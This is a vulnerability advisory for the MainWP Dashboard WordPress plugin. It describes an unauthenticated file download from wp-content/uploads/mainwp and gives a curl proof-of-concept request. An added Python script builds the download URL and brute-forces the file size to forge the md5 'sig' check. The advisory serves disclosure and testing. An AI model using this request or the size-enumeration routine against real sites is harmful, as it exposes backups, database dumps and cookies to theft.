MainWP Dashboard [Unauthenticated Local File Download]

Description

The MainWP Dashboard plugin allows anyone to download files stored under wp-content/uploads/mainwp without authentication.

Files stored in that location contain sensitive information such as cookies, database dumps and file backups.

On WordPress initialization the plugin calls MainWP_System::parse_init(). This method checks whether various $_GET parameters are set and, if they are, performs a series of predefined actions. Because the method runs on every WordPress initialization, those actions are also reachable by unauthenticated users.

To download a file, the attacker must know its path relative to wp-content/uploads/mainwp and its exact size. The size is required because the plugin compares the $_GET['sig'] parameter with the md5 hash of the file size.

Downloading a file outside wp-content/uploads/mainwp does not seem possible, because the plugin rejects paths containing double dots.
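The following Python script is an added example and is not part of the advisory or of the plugin's code. It models the two checks the advisory describes (sig must equal md5 of the file size; paths containing ".." are rejected), builds the same request the PoC uses, and shows a caveat a tester should keep in mind: the file size is the only secret protecting a known path, so it can be enumerated by retrying with sig = md5(n) for increasing n. The upload directory, the 0-byte index.php and the 1234-byte backup.zip are constructed for the example; the modelled check assumes no other server-side condition exists beyond the two the advisory mentions.

```python
"""Model of the 'mwpdl' download check as the advisory describes it.

Added example, not plugin source: the decision logic is reconstructed
from the advisory text (sig = md5 of the decimal file size, '..' rejected).
"""
import hashlib
import os
import tempfile
from urllib.parse import urlencode


def mainwp_sig(size: int) -> str:
    """The 'sig' value: md5 of the decimal file size as an ASCII string."""
    return hashlib.md5(str(size).encode("ascii")).hexdigest()


def download_url(base_url: str, rel_path: str, size: int) -> str:
    """Build the unauthenticated download request for a file of known size."""
    query = urlencode({"mwpdl": rel_path, "sig": mainwp_sig(size)})
    return base_url.rstrip("/") + "/?" + query


def serve_decision(upload_dir: str, rel_path: str, sig: str):
    """Modelled server-side decision (assumption: only the two checks the
    advisory mentions exist). Returns the path that would be served, or
    None if the request is refused."""
    if ".." in rel_path:                      # the double-dot traversal check
        return None
    full = os.path.join(upload_dir, rel_path)
    if not os.path.isfile(full):
        return None
    if sig != mainwp_sig(os.path.getsize(full)):
        return None
    return full


def guess_size(upload_dir: str, rel_path: str, max_size: int):
    """Caveat for the 'attacker must know the exact size' requirement: the
    size is the only secret, so an attacker can enumerate it by retrying the
    request with sig = md5(n) for n = 0, 1, 2, ... until the file is served.
    Modelled locally here; returns the size that was accepted, or None."""
    for n in range(max_size + 1):
        if serve_decision(upload_dir, rel_path, mainwp_sig(n)) is not None:
            return n
    return None


def demo() -> dict:
    """Constructed sample upload directory mirroring the advisory's PoC."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "index.php"), "wb").close()       # 0-byte file from the PoC
        with open(os.path.join(d, "backup.zip"), "wb") as f:   # constructed 'backup'
            f.write(b"Z" * 1234)
        return {
            "index_served": serve_decision(d, "index.php", mainwp_sig(0)) is not None,
            "wrong_sig_refused": serve_decision(d, "index.php", mainwp_sig(1)) is None,
            "traversal_refused": serve_decision(d, "../wp-config.php", mainwp_sig(0)) is None,
            "backup_size_found": guess_size(d, "backup.zip", 5000),
        }


if __name__ == "__main__":
    print(download_url("http://sbwp1.dev", "index.php", 0))
    print(demo())
```

Running the script prints the same request as the PoC for index.php and shows that the 1234-byte backup is located after at most 1235 attempts, which is why treating the file size as a secret is not a meaningful protection.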

PoC

If the plugin is installed it should have created the file wp-content/uploads/mainwp/index.php, which is 0 bytes, so its sig is md5("0") = cfcd208495d565ef66e7dff9f98764da. We can download it with the following request.

curl 'http://sbwp1.dev/?mwpdl=index.php&sig=cfcd208495d565ef66e7dff9f98764da'
